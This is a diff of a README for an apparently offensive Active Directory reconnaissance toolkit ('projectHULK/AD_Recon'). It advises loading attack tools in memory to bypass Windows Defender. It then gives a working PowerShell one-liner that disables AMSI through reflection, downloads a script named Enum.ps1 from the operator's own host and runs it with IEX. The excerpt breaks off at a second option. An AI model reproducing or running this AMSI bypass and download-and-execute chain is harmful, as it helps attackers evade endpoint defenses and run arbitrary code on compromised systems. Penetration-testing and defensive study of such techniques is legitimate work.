projectHULK/AD_Recon/README.md

 * Get-Module -ListAvailable | Import-Module

 # As a good practice
-* Create a powershell script which will bypass AMSI, load tools and run them in momory 'bypassing Defender'
+1) Insted of download script one-by-one, create a powershell script which will load all your tools to the system.
+2) Run any AMSI bypass comand and call your script to run them in momory 'bypassing Defender'.
-* I have created Enum.ps1 which will download all the tools and run them 'Put your IP'.
-You can use the bellow oneliner to bypass AMSI, download Enum.ps1 and run the comands in memory:
+* I have created Enum.ps1 which will download all the tools 'Put your IP'.
+3) You can use the bellow oneliner to bypass AMSI, download Enum.ps1 and run in memory:
 * Option 1)
 $a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Failed") {$f = $e}};$f.SetValue($null,$true); (new-object system.net.webclient).downloadstring('http://<Your IP>/Enum.ps1') | IEX
 * Option 2)